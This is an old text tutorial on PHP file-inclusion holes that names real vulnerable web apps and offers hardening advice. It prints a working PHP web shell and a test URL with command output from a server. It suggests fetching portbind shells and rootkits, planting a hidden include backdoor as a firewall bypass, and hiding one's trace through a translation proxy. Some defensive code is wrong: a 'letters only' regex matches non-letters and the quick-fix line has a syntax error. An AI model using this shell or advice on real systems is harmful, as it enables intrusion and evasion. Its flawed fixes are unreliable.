=====================================================
Topic: PHP file Inclusion.
Author: Rowter (
rowter@vulnfact.com)
=====================================================
-
This text has the purpose of teaching how file inclusion works,
so security manager have a better aprouch when coding or using
open source apps, being careful with this particular aspect.
-
First of all, the most common functions on php for file inclusions
are include(), require(), require_once(), fopen(), readfile(),
and virtual(), this functions accept local path names as well
as remote files using URLs.
Real Life Examples:
Product: My_eGallery
Versions affected: all <3.1.1.g
Website:
http://lottasophie.sourceforge.net/index.phpCVS:
http://cvs.sourceforge.net/viewcvs.py/lott...layCategory.php Revision 1.15 - (download), view (text) (markup) (annotate) - [select for diffs]
Mon Jul 21 18:38:31 2003 UTC (5 months, 1 week ago) by jnapp
line : 26-28
include ("$basepath/public/imageFunctions.php");
include ("$basepath/includes/fileFunctions.php");
include ("$basepath/includes/treemenu.php");
^
/ \
|
|
There, we could see he used
a variable for setting the
basepath without checking
it first, big mistake.
evilfile.txt -> for inclusion.
could work something like
<?passthru("$cmd);?>
or
This code is used on the Wild:
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
Testing:
http://example.com/modules/My_eGallery/pub...uname%20-a%20;w output:
uid=578(u1374) gid=584(u1374) groups=584(u1374) Linux server8.8.isreserved.com
2.4.20-24.7 #1 Mon Dec 1 13:35:11 EST 2003 i686 unknown sh: /usr/bin/w:
Permission denied PHP Warning: Failed opening '/fileFunctions.php' for inclusion
(include_path='.:/usr/share/php/PEAR') in
/home/sloki/user/u1374/sites/www/modules/My_eGallery/public/displayCategory.php
on line 3
Warning: Failed opening '/fileFunctions.php' for inclusion
(include_path='.:/usr/share/php/PEAR') in
/home/sloki/user/u1374/www/modules/My_eGallery/public/displayCategory.php
on line 3
Common things ppl do after evil inclusion:
wget a portbind :
http://www.shellcode.com.ar/en/shellcodes.htmlExcecute a local exploit.
Execute their favorite rootkit,bnc etc. lame >(
Quick Solution:
if (isset($_REQUEST["basepath"])){ die("WTF?)"; }
Important Security Matters to Remember:
=Magic_quotes_gpc On and register_globals Off
This is the best solution by far as it defuses in advance a lot of potential
security problems that originate from code injection or specification of
non-empty default values.
=Run PHP in Safe Mode
Safe Mode only permits modifications of files owned by the user that also owns
the executing script.
=Filter all input data that originates from the browser
The input data from the browser includes not only the data in the $_POST
array, but also the data in $_GET and $_COOKIE, as well as some data
in $_SERVER that is based on browser-supplied information.
That includes, among other things, the browser machine's IP address and
the URL that purportedly referred the browser to your script.
few useful expressions:
A string that must only contain letters /^[\W_\d]*$/
A non-empty string that must only contain letters /^[^\W_\d]+$/
A string that must only contain letters and that has to start with, evil /^evil[^\W_\d]*$/
A string that contains an e-mail address /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{3}/
example:
<?php
$path = 'pages/';
$extension = '.php';
if ( preg_match("#^[a-z0-9_]+$#i",$page) ){
$filename = $path.$page.$extension;
include($filename);
}
?>
This will only make sure only files from the directory $path are called if
they have the fileextension $extension.
=External functions to the absolutely necessary minimum
For most day-to-day tasks, PHP has customized functions available, which are
easily found in the PHP manual. The use of external functions for the same
purpose can only carry additional risk.
There are lots of other apps with same problems:
Product: 2Gallery
Website: none, not opensource
<? if(empty($page)) $page="home"; include $page.".php"; ?>
Vulnerable systems:
* bes-cms version 0.4 rc3
* bes-cms version 0.5 rc3
http://www.securiteam.com/unixfocus/6S00L0K96S.htmlProduct : Advanced Poll
Version : 2.0.2 Textfile
Website :
http://www.proxy2.dehttp://security.opennet.ru/base/cgi/1067362687_1086.txt.htmlNote: this could always work as a firewall bypass, if you has access to some
webserver your could leave a bad coded php file so you could later on execute
with apache access the portbinding.
something like:
if ($HTTP_GET_VARS[x0x]==1)
{include($evilxpage);}
and if you are worried about being traced when including a file, you could
allways use your proxy google testing friend:
http://translate.google.com/translate?u=www.whatismyip.comUsefull links:
http://php.ru.ac.za/manual/en/function.include.php 
